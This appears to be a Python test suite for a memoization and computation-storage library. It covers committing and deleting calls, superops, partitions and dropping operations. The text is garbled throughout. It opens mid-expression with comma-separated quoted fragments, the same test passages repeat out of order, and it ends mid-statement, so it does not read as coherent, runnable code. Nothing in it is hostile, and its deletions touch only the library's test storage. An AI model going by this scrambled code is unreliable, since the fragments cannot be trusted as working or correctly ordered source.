inc_locs =", "for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert", "42) c.commit_deletions() ### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert", "z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops():", "inc(i) c.commit() with run(storage, autocommit=False) as c: for i in range(10, 20): inc(i)", "i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c: for i", "with run(storage, autocommit=False, partition='second') as c: for i in range(10, 20): inc(i) with", "assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage, autocommit=True):", "nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage()", "get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True)", "with run(storage, autocommit=False) as c: for i in range(10): inc(i) c.commit() with run(storage,", "'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################", "df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do computation again", "drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def", "incs = [inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs))", "def get_divisors(num:int) -> TList[int]: return [x for x in range(1, num) if num", "mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop", "# delete only latter part with run(storage=storage) as c: nums = range(10) incs", "range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() inc_locs", "range(1, num) if num % x == 0] @superop(storage) def f(lst:TList[int]) -> int:", "in nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it", "= add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt)", "calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as c: nums =", "means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c: things = [] means", "x = add(23, 42) c.commit() ### delete the work with delete(storage=storage) as c:", "[inc(x) for x in nums] final = mean(x=incs) c.commit() # delete only latter", "1 @op(storage) def add(x:int, y:int) -> int: return x + y ### drop", "chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums =", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ # run a workflow of", "for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True)", "def inc(x:int) -> int: return x + 1 @op(storage) def add(x:int, y:int) ->", "### do some work with run(storage=storage) as c: x = add(23, 42) c.commit()", "some work with run(storage=storage) as c: x = add(23, 42) c.commit() ### delete", "return [x for x in range(1, num) if num % x == 0]", "assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as", "def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for", "with delete(storage, autodelete=False) as c: nums = range(10) incs = [inc(x) for x", "= [] for i in range(10): thing = inc(i) things.append(thing) for j in", "autocommit=False, partition='second') as c: for i in range(10, 20): inc(i) with run(storage, autocommit=False,", "means = [] for i in range(10): thing = inc(i) things.append(thing) for j", "with run(storage) as c: nums = range(10) incs = [inc(x) for x in", "parts with run(storage=storage) as c: nums = range(10) incs = [inc(x) for x", "as c: for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once ############################################################################ with run(storage=storage) as c:", "i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0", "c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc =", "0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as c: for i", "range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for i in range(10,", "range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c: for i in range(20,", "setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ###", "= [inc(x) for x in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x)", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42,", "schema changes across tests \"\"\" storage = Storage() @op(storage) def inc(x:int) -> int:", "-> TList[int]: return [inc(x) for x in chunk] with run(storage, autocommit=True): nums =", "as c: nums = range(10) incs = [inc(x) for x in nums] with", "assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits between partitions with", "= add(23, 42) c.commit_deletions() ### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op,", "int: return x + y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add',", "in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for i in range(10,", "partitions with run(storage, autocommit=False, partition='first') as c: for i in range(10): inc(i) c.commit()", "run(storage=storage) as c: things = [] means = [] for i in range(10):", "assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed", "from .conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ###", "test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i", "nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs())", "42) c.commit() ### delete the work with delete(storage=storage) as c: x = add(23,", "for x in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x", "inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test", "range(10) incs = [inc(x) for x in nums] with c(mode=MODES.delete) as d: final", "version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit", "assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) ->", "range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() #", "as d: final = mean(x=incs) d.commit_deletions() # check it got deleted but earlier", "in range(1, num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) ->", "10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage,", "elt in divs] @op(storage) def inc(x:int) -> int: return x + 1 @superop(storage)", "len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work", "c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} ==", "storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only,", "== 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with", "as c: nums = range(10) incs = [inc(x) for x in nums] final", "len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as c:", "c.commit() with run(storage, autocommit=False, partition='second') as c: for i in range(10, 20): inc(i)", "the work with delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ### check", "x in nums] final = mean(x=incs) c.commit() # delete only latter part with", "changes across tests \"\"\" storage = Storage() @op(storage) def inc(x:int) -> int: return", "import * from .conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage", "range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 20", "range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True)", "range(1, num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]:", "run(storage=storage) as c: x = add(23, 42) c.commit() with query(storage=storage) as c: x,", "autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage =", "in divisors_list for elt in divs] @op(storage) def inc(x:int) -> int: return x", "get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting", "Storage() @op(storage) def inc(x:int) -> int: return x + 1 @op(storage) def add(x:int,", "= setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i in range(10): inc(i)", "as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls()", "df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once", "if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list =", "assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) ->", "storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some work", "storage.call_st.locs() ### do computation again with run(storage=storage) as c: x = add(23, 42)", "inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after", "work with delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ### check if", "range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert", "autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs())", "computation again with run(storage=storage) as c: x = add(23, 42) c.commit() with query(storage=storage)", "x = add(23, 42) c.commit() with query(storage=storage) as c: x, y = Any(),", "### deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as c:", "import * from .funcs import * from .conftest import setup_tests def test_simple(setup_tests): storage,", "final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert not", "len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of", "to prevent schema changes across tests \"\"\" storage = Storage() @op(storage) def inc(x:int)", "final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums =", "############################################################################ ### deleting some things only ############################################################################ # run a workflow of several", "vrefs remain orphaned ############################################################################ with run(storage) as c: nums = range(10) incs =", "run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True):", "if num % x == 0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0]", "== {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once ############################################################################", "TList[int]: return [inc(x) for x in chunk] with run(storage, autocommit=True): nums = list(range(20))", "int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst", "for i in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for i", "things only ############################################################################ # run a workflow of several parts with run(storage=storage) as", "c: nums = range(10) incs = [inc(x) for x in nums] with c(mode=MODES.delete)", "= setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some work with run(storage=storage)", "int: return x + 1 @op(storage) def add(x:int, y:int) -> int: return x", "### delete the work with delete(storage=storage) as c: x = add(23, 42) c.commit_deletions()", "storage:Storage ############################################################################ ### unit ############################################################################ ### do some work with run(storage=storage) as c:", "= inc(i) things.append(thing) for j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean)", "############################################################################ ### unit ############################################################################ ### do some work with run(storage=storage) as c: x", "run(storage) as c: nums = range(10) incs = [inc(x) for x in nums]", "storage = Storage() @op(storage) def inc(x:int) -> int: return x + 1 @op(storage)", "concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def", "-> int: return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x)", "rename=True) assert df.empty assert not storage.call_st.locs() ### do computation again with run(storage=storage) as", "for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs())", "autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs()", "setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i in range(10): inc(i) assert", "things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert", "@op(storage) def get_divisors(num:int) -> TList[int]: return [x for x in range(1, num) if", "x = add(23, 42) c.commit_deletions() ### check if things got deleted df =", "inc(x:int) -> int: return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return", "autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst)", "delete(storage=storage) as c: things = [] means = [] for i in range(10):", "in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True)", "42) c.commit() with query(storage=storage) as c: x, y = Any(), Any() z =", "[x for x in range(1, num) if num % x == 0] @superop(storage)", "final = mean(x=incs) c.commit() # delete only latter part with run(storage=storage) as c:", "mean(means) c.commit_deletions() for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert", "x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################", "df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] ==", "empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in", "in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for", "assert df.empty assert not storage.call_st.locs() ### do computation again with run(storage=storage) as c:", "with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations", "assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums = range(10) incs =", "inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in chunk] with run(storage, autocommit=True): nums", "divs] @op(storage) def inc(x:int) -> int: return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int])", "[inc(x) for x in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for", "### deleting some things only ############################################################################ # run a workflow of several parts", "thing = inc(i) things.append(thing) for j in range(10): things.append(add(thing, j)) cur_mean = mean(things)", "storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts =", "for divs in divisors_list for elt in divs] @op(storage) def inc(x:int) -> int:", "for i in range(10): thing = inc(i) things.append(thing) for j in range(10): things.append(add(thing,", "[] for i in range(10): thing = inc(i) things.append(thing) for j in range(10):", "for elt in divs] @op(storage) def inc(x:int) -> int: return x + 1", "storage:Storage ### unit with run(storage, autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs())", "of commits between partitions with run(storage, autocommit=False, partition='first') as c: for i in", "not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]:", "deleting with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage,", "inc(i) things.append(thing) for j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final", "65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once ############################################################################ with run(storage=storage) as", "10 storage.drop_instance_data(answer=True) ### test isolation of commits between partitions with run(storage, autocommit=False, partition='first')", "not storage.call_st.locs() ### do computation again with run(storage=storage) as c: x = add(23,", "c.commit() with delete(storage=storage) as c: things = [] means = [] for i", "### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True)", "storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False):", "1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in chunk] with", "delete the work with delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ###", "storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums = range(10) incs", "storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False)", "unit ############################################################################ ### do some work with run(storage=storage) as c: x = add(23,", "= [] means = [] for i in range(10): thing = inc(i) things.append(thing)", "drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i", "committed work with run(storage, autocommit=False) as c: for i in range(10): inc(i) c.commit()", "def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in chunk] with run(storage, autocommit=True):", "add(23, 42) c.commit_deletions() ### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True)", "x == 0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True):", "d: final = mean(x=incs) d.commit_deletions() # check it got deleted but earlier things", "x, y = Any(), Any() z = add(x, y) df = c.qeval(x, y,", "-> TList[int]: return [x for x in range(1, num) if num % x", "== 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits", "with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op():", "rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only", "with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True):", "between partitions with run(storage, autocommit=False, partition='first') as c: for i in range(10): inc(i)", "c: things = [] means = [] for i in range(10): thing =", "with run(storage=storage) as c: x = add(23, 42) c.commit() with query(storage=storage) as c:", "= Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x in range(1,", "= [inc(x) for x in nums] with c(mode=MODES.delete) as d: final = mean(x=incs)", "[] means = [] for i in range(10): thing = inc(i) things.append(thing) for", "storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ # run a workflow", "with delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ### check if things", "nums = range(10) incs = [inc(x) for x in nums] with c(mode=MODES.delete) as", "tests \"\"\" storage = Storage() @op(storage) def inc(x:int) -> int: return x +", "do some work with run(storage=storage) as c: x = add(23, 42) c.commit() ###", "### deleting with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with", "def inc(x:int) -> int: return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]:", "@superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in chunk] with run(storage,", "cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc, add,", "in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) ==", "add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True)", "again with run(storage=storage) as c: x = add(23, 42) c.commit() with query(storage=storage) as", "############################################################################ ### deleting with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5)", "c.commit() ### delete the work with delete(storage=storage) as c: x = add(23, 42)", "deleting some things only ############################################################################ # run a workflow of several parts with", "version='0') with run(storage, autocommit=True): for i in range(10): inc(i) ### drop op with", "only, verifying vrefs remain orphaned ############################################################################ with run(storage) as c: nums = range(10)", "incs = [inc(x) for x in nums] with c(mode=MODES.delete) as d: final =", "in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ###", "deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do computation", "range(10): thing = inc(i) things.append(thing) for j in range(10): things.append(add(thing, j)) cur_mean =", "f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are isolated", "int: return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for", "got deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df", "### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for", "storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain orphaned ############################################################################ with", "y:int) -> int: return x + y ### drop empty op storage.drop_func(f=add) assert", "x in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in", "isolated to prevent schema changes across tests \"\"\" storage = Storage() @op(storage) def", "partition='third') as c: for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) ==", "lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst = get_divisors(100)", "assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10): inc(i) ###", "elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls", "divs in divisors_list for elt in divs] @op(storage) def inc(x:int) -> int: return", "query(storage=storage) as c: x, y = Any(), Any() z = add(x, y) df", "df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting", "with delete(storage=storage) as c: things = [] means = [] for i in", "prevent schema changes across tests \"\"\" storage = Storage() @op(storage) def inc(x:int) ->", "inc(i) with run(storage, autocommit=False, partition='third') as c: for i in range(20, 30): inc(i)", "in nums] return [elt for divs in divisors_list for elt in divs] @op(storage)", "assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are isolated to", "part with run(storage=storage) as c: nums = range(10) incs = [inc(x) for x", "== 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as c: for", "in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with", "delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage", "f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def", "calls at once ############################################################################ with run(storage=storage) as c: things = [] means =", "for x in range(1, num) if num % x == 0] @superop(storage) def", "run(storage, autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert", "x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num", "as c: x = add(23, 42) c.commit() ### delete the work with delete(storage=storage)", "cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c: things", "in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c: for i in", "not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums = range(10) incs = [inc(x)", "len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]:", "across tests \"\"\" storage = Storage() @op(storage) def inc(x:int) -> int: return x", "y = Any(), Any() z = add(x, y) df = c.qeval(x, y, z,", "TList[int]: return [x for x in range(1, num) if num % x ==", "### deleting multiple calls at once ############################################################################ with run(storage=storage) as c: things =", "len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits between partitions with run(storage,", "c: x = add(23, 42) c.commit_deletions() ### check if things got deleted df", "0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x", "range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ###", "in range(10): thing = inc(i) things.append(thing) for j in range(10): things.append(add(thing, j)) cur_mean", "it got deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty", "run(storage, autocommit=False, partition='first') as c: for i in range(10): inc(i) c.commit() with run(storage,", "with query(storage=storage) as c: x, y = Any(), Any() z = add(x, y)", "mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c: things = []", "range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func", "storage, cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i in", "= list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage)", "mean(x=incs) c.commit() # delete only latter part with run(storage=storage) as c: nums =", "df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ###", "with run(storage, autocommit=False, partition='third') as c: for i in range(20, 30): inc(i) c.commit()", "mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc, add, mean): df", "def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst)", "things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func in", "superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42,", "partition='second') as c: for i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third')", ".funcs import * from .conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests", "# cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with", "with run(storage, autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls()", "{tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting", "x in nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check", "work with run(storage, autocommit=False) as c: for i in range(10): inc(i) c.commit() with", "= range(10) incs = [inc(x) for x in nums] with c(mode=MODES.delete) as d:", "autocommit=False) as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False) as", "% x == 0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage,", "partition='first') as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second')", "= range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit_deletions()", "storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10): inc(i)", "setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some work with run(storage=storage) as", "autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert", "= get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for", "with run(storage=storage) as c: things = [] means = [] for i in", "num in nums] return [elt for divs in divisors_list for elt in divs]", "any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums", "but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op,", "a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23,", "= mean(x=incs) d.commit_deletions() # check it got deleted but earlier things didn't df", "concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num 